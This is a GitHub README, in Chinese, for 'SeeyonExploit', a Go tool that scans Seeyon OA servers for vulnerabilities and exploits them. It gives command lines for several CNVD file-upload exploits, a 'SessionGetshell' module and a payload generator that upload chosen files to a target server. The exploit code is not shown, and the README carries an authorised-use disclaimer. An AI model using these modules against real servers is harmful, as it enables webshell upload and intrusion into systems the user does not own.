Skip to content

Drac0nids/SeeyonExploit

Repository files navigation

SeeyonExploit

基于go语言的致远OA漏洞检测工具

编译

go build -o SeeyonExploit main.go

漏洞扫描

./SeeyonExploit VulScan -u http://xxx.xxx.xxx.xxx

批量扫描

./SeeyonExploit VulScan -f url.txt

url.txt中每行一个扫描目标

http://test.com
http://test2.com

漏洞利用

CNVD201919299

./SeeyonExploit CNVD201919299 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

CNVD202101627

./SeeyonExploit CNVD202101627 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

HW2021 (2021HW nday 对CNVD202101627的绕过)

./SeeyonExploit HW2021 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

SessionGetshell

./SeeyonExploit SessionGetshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名

辅助工具

DecAndGen

该工具可以生成CNVD202101627以及HW2021漏洞的payload或者解密payload

生成payload:

./SeeyonExploit DecAndGen -f 本地文件 -n 服务器端生成的文件名

还可以使用-o 文件名,将生成的payload输出到文件中

解密payload:

./SeeyonExploit DecAndGen -s 待解密的payload字符串或payload文件

同样可以使用-o 文件名,将生成的payload输出到文件中。-s后面可以接待解密的字符串,也可以接待解密字符串文件的文件名

免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。

About

基于go语言的致远OA漏洞检测工具

Resources

Stars

Watchers

Forks

Packages

No packages published